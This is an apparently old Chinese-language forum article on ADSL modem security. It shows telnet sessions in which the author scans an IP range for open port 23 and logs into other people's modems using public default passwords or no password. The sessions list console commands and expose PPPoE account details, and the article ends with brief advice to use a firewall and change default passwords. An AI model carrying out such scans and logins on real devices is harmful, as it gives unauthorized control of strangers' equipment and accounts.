一些ADSL Modem的安全問題
現在用ADSL的人越來越多了,電信局也大力推薦一些帶路由的ADSL MODEM,大家都知道,這些ADSL MODEM大多數用Telnet設置,例如南寧電信推薦大多數用戶使用的ZyXEL PRESTIGE 642 ADSL Modem。
但是很多用戶的安全意識不高。
密碼
一般ADSL Modem需要一個密碼登陸設置界面,但這個預設密碼經常被公開,而電信局也沒有提示用戶更改,這樣的MODEM給用戶留下了一個隱患
破壞
ADSL Modem的設置裡經常有些敏感選項,如reset、disconnect、reboot等,一旦這些設置改動,你的Modem也許就「廢」了
實例
用任意一個掃瞄器掃自己所處IP段的23端口,一會兒就會看到一些IP有回應了,現在Telnet上去:
c:\windows\>telnet x.x.x.x 23
Router Manager Console Version: 1.07
Please enter your password:
要密碼?上google找一下相關資料,Login~~
Please enter your password: ****
User Logged in.
Router Setup>
c:\windows\>telnet x.x.x.x 23
*******************
Welcome to Titanium
*******************
GlobespanVirata Inc., Software Release VIK-1.37.020524i/T93.3.13.
Copyright (c) 2001-2002 by GlobespanVirata, Inc.
login:
又要?再google……
上面兩個都是要預設密碼的,不好玩,看看下面的拍案驚奇:
c:\windows\>telnet x.x.x.x 23
ISIN 6131R Copyright by ARESCOM 2001
Login Success!
大哥有沒有搞錯?我沒輸入Password啊~~~@_@
ISIN>help
先看看幫助
******* Console Help Menu *******
Available Command:
add add objects in talbe
connect start the connection
delete delete objects in table
disconnect disconnect modem connection
help display this menu again
quit quit the system
reboot reboot the router
reset reset the configuration, and reboot
save save the configuration
set set system parameters
show display system status
test system test
upgrade upgrade the firmware via FTP, TFTP and XMODEM
ISIN>show sysinfo
Vendor: Arescom
Model: ISIN 6131R (Hardware)
Version: 5.3.08B (Software version)
UpTime: 0363:57 (hh:mm)
ISIN>
再看:
c:\windows\>telnet x.x.x.x 23
logged on; type `@exit' to close connection.
>>help
陌生人記得問路:P
Command:
adsl - entry to ADSL menu
default - set all configuration to factory setting
ipoa - entry to IPoA menu
lan - entry to Ethernet menu
list - list status for enabled PVC
manage - entry to management menu
mode - exit this menu and change modem mode
pat - entry to PAT menu
ping - ping IP for testing purpose
pppoa - entry to PPPoA menu
pppoe - entry to PPPoE menu
quick - quick setup
r1483 - entry to RFC1483 menu
restart - reboot modem
rtable - entry to Routing Table menu
save - save and restart modem
show - display configuration of PVC and Ethernet
ver - display software version
Type 'help' or 'help <command>' for more details
>> show
看看他有什麼秘密?
Ethernet ip: 192.168.1.1
Subnet mask: 255.255.255.0
FullDuplex:Enable
DHCP current setting : disable.
DHCP ineffective setting : disable.
PPPoE setting:
Function VPI/VCI CLASS UserID/Authentication
PPPoE 0/35 ubr bnn*******/CHAP <-------賬號
LLC=Disable Echo is disabled
PPPoE IP : 218.21.*.*
PAT enabled interface:
Interface IP address
PPPoE 218.21.*.*
PAT incoming table:
No. i/f name|WanIP Port/Protocal Server IP
1 pppoe 23/tcp 192.168.1.1
effective routing table:
route add ppp_route 0.0.0.0 218.21.*.* 00:00:00:00 1 # MAN via ppp_
device
>> ver
Version : 2.80ZE (2.80ZE-H01.2103-FM11.0507A10Z 24/Jul/2001 14:50)
僅僅這樣就掌握了整個MODEM的控制權!只要我修改他的配置,他的MODEM就麻煩了,等電信局的人上門維修吧!
預防
安裝防火牆,禁止外部連接,更改ADSL Modem預設密碼。
Btw:
hinet 提供的adsl modem 有設定密碼,且並沒提供你知,你無法打開adsl modem
設定或更新一些高階或硬體撥號 硬體防火牆功能...
|